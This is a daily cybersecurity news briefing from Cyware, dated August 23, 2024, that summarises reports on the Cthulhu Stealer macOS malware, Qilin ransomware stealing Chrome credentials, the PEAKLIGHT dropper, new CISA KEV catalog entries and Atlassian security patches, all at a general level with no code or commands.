Cyware Daily Threat Intelligence

Daily Threat Briefing • Aug 23, 2024
This website uses cookies and similar technologies to provide essential functionality and improve your experience. Some features, such as demo scheduling and chat support, require marketing cookies to function. By clicking "Accept All", you consent to all cookies. Alternatively, you can customize your preferences, but note that declining marketing cookies will limit certain website features.
Daily Threat Briefing • Aug 23, 2024
Newly emerging info-stealers are pushing the boundaries of cyber threats, making defenses more crucial than ever. One targets macOS users by disguising itself as legitimate software, stealing sensitive information such as cryptocurrency wallets and game account details. Another is a memory-only dropper and PowerShell-based downloader to deliver various malicious payloads through deceptive LNK files.
Alongside these, persistent vulnerabilities in key infrastructure continue to pose serious risks. Critical vulnerabilities have been added to the CISA KEV catalog, including flaws in Dahua IP cameras, the Linux kernel, and Microsoft Exchange Server, which are being actively exploited by threat actors. Federal agencies have until September 11 to address these vulnerabilities.
Emergence of Cthulhu Stealer for macOS
Researchers observed the emergence of a new threat called Cthulhu Stealer. This malware targets macOS users by disguising itself as legitimate software, prompting users to enter their passwords and MetaMask credentials, and then stealing sensitive information such as cryptocurrency wallets and game account details. The functionality of Cthulhu Stealer is similar to another macOS malware called Atomic Stealer, indicating that the code may have been modified from the latter.
Qilin ransomware stole Chrome credentials
The Qilin ransomware group targeted a network's endpoints, stealing credentials stored in Google Chrome browsers. They gained access through compromised credentials and used a logon GPO to execute scripts that harvested credentials on user devices. The stolen credentials were exfiltrated, event logs were cleared, and files were encrypted with a ransom note left behind. The attack exploited the widespread use of Chrome and required defenders to change all Active Directory passwords.
PEAKLIGHT: new evasive memory-only malware
Mandiant identified a memory-only dropper and PowerShell-based downloader, named PEAKLIGHT, delivering MaaS info-stealers such as LUMMAC.V2, SHADOWLADDER, and CRYPTBOT. The initial infection vector was a Microsoft Shortcut File (LNK) disguised as pirated movies, executing PowerShell scripts to download and execute malicious payloads. The malware uses different obfuscation and evasion techniques and takes advantage of reputable content delivery networks to host its malicious payloads.
CISA adds four bugs to KEV catalog
The CISA added several vulnerabilities to its KEV catalog. These include authentication bypass vulnerabilities (CVE-2021-33044 and CVE-2021-33045) in Dahua IP cameras, a Linux kernel heap-based buffer overflow flaw (CVE-2022-0185), and an information disclosure vulnerability (CVE-2021-31196) in Microsoft Exchange Server. The Linux kernel vulnerability has been exploited by threat actors in attacks, allowing for privilege escalation for unprivileged local users. The Microsoft Exchange Server vulnerability, enables remote code execution and was addressed by Microsoft in May 2021. Federal agencies must address these vulnerabilities by September 11.
Atlassian patches multiple flaws
Atlassian released its August 2024 security bulletin, detailing nine high-severity vulnerabilities in products such as Bamboo, Confluence, Crowd, and Jira. Bamboo Data Center and Server received patches for two high-severity flaws, including an RCE bug (CVE-2024-21689) and a DoS issue (CVE-2024-29857) related to the Bouncy Castle Java dependency. Confluence Data Center and Server also received patches for two high-severity security defects, including a DoS issue in Apache Tomcat (CVE-2024-34750) and a reflected XSS and CSRF issue (CVE-2024-21690). Crowd Data Center and Server had three high-severity SSRF bugs (CVE-2024-22259, CVE-2024-22243, and CVE-2024-22262) resolved, and Jira had a high-severity flaw (CVE-2024-34750) related to Apache Tomcat.